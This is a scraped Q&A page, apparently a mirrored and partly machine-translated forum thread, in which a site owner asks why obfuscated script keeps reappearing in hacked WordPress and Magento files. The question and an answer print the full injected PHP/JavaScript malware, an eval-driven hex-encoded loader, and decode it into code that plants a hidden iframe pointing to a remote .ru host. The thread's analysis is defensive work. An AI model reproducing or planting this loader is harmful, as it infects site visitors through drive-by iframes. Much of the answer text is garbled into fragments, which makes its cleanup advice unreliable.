Does js attacker automatically inject header.php and many other js files into my files?

Question

Does js attacker automatically inject header.php and many other js files into my files?

Currently, I am faced with a hell of a situation, four of my client sites were hacked up to 10 days. I mixed up a lot with them, and three of them work fine (magento running) after my long mess with them, but one of them (running text press) still faces the same situation, and I could not understand what happens after certain js files and some php files are also automatically entered with this code:

<?
#ded509#
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>";
#/ded509#
?>

This code is entered into all js files and main files, I changed ftp passwords, I checked cron jobs, and manually I searched for any php code (it seems to me that some kind of PHP code does this), but I can’t understand this, and yes, I tried to decode this code and tried to get functionality for this code, but removing this malicious code from my js files will make my site beautiful for some time, but after a random time the scripts will automatically enter this code? what is this js code? It will be very helpful if someone explains what is actually happening?

+5

javascript jquery php malware

Pranshu jain Apr 24 '13 at 6:23

source share

2 answers

, 444. , index.php/html .htaccess . , 555.

. , , contact_us .., . .

0

tornados 24 . '13 6:28

kiranvj · Accepted Answer · 2013-04-24T06:37:20+0000

What PHP is repeating this

<script type="text/javascript" language="javascript" > e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);s="";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>

In readable form, it looks like

e = eval;

v = "0x";
a = 0;
try {
    a &= 2
} catch (q) {
    a = 1
}
if (!a) {
    try {
        document["body"] ^= ~1;
    } catch (q) {
        a2 = "!"
    }
    z = "2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);
    s = "";
    if (window.document) for (i = 0; i < z.length; i++) {
            s += String.fromCharCode(e(v + (z[i])) - 7);
    }
    zaz = s;
    e(zaz);
}

There eis a function in the above codeeval

eval zaz, .

(function () {
    var c = document.createElement('iframe');

    c.src = 'http://jakyskyf.ru/count16.php';
    c.style.position = 'absolute';
    c.style.border = '0';
    c.style.height = '1px';
    c.style.width = '1px';
    c.style.left = '1px';
    c.style.top = '1px';

    if (!document.getElementById('c')) {
        document.write('<div id=\'c\'></div>');
        document.getElementById('c').appendChild(c);
    }
})();

. script iframe http://jakyskyf.ru/count16.php

, , .

.

- . .
.
.
Wordpress ( Wordpress). Wordpress .
admin admin .
. , , .

Does js attacker automatically inject header.php and many other js files into my files?

More articles: